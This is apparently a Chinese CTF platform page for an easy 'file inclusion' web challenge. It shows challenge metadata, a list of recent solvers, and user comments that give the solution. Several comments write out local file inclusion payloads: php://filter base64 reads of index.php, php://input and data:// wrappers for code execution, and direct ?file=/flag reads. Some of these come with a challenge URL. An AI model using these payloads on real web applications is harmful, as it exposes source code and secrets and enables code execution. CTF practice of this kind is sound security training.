文件包含WEB 未解决

分数: 20 金币: 2
题目作者: harry
一  血: 不会CTF的麻风
一血奖励: 1金币
解  决: 12595
提  示:
描  述:
flag{}
评论
帅帅123 8天前

发现参数?file= 怀疑是文件读取或者目录穿越 尝试php为协议 命令执行:php://input data://text/plain,<?php ?> 字节流编码读取: php://filter/conver.base64-encode/resource=index.php

回复 0

奔跑的开开 21天前

?file=php://filter/read=convert.base64-encode/resource=index.php

回复 0

ok了 2月前

?file=php://filter/read=convert.base64-encode/resource=index.php 秒了

回复 0

VVang 2月前

用php://filter包含index.php,然后base64解码得到flag

回复 1

聪10011 3月前

猜flag位置,file=/flag

回复 1

8208240204 3月前

?file=php://filter/read=convert.base64-encode/resource=index.php 然后发现==表明是base64解码得到flag

回复 1

2686213396 4月前

http://117.72.52.127:17540/index.php?file=php://filter/convert.base64-encode/resource=index.php,php伪协议,读取 index.php文件

回复 0

zhuizhui 5月前

?file=php://filter/read=convert.base64-encode/resource=index.php

回复 0

17734916426 7月前

index.php?file=/flag

回复 1

shingu 8月前

这题过于简单了。?file=/flag。

回复 2

WriteUp

image
harry

2 金币

评分(11)

解题动态

zzuer 攻破了该题 1天前
Finiy 攻破了该题 1天前
qsy 攻破了该题 1天前
月光照流年 攻破了该题 1天前
Zhengzanmei 攻破了该题 1天前
Fengyu3321 攻破了该题 1天前
edu123 攻破了该题 1天前
2562248320 攻破了该题 2天前
白菜白又白 攻破了该题 2天前
igrazee 攻破了该题 2天前
邪恶的番茄 攻破了该题 2天前
Yuyukon 攻破了该题 2天前
Despa1r 攻破了该题 2天前
huluobu 攻破了该题 3天前
不知道不晓得 攻破了该题 3天前
2360657787 攻破了该题 3天前
林夕言 攻破了该题 3天前
顾无澜 攻破了该题 3天前
铭风 攻破了该题 3天前
66666ctfxr 攻破了该题 3天前
问题反馈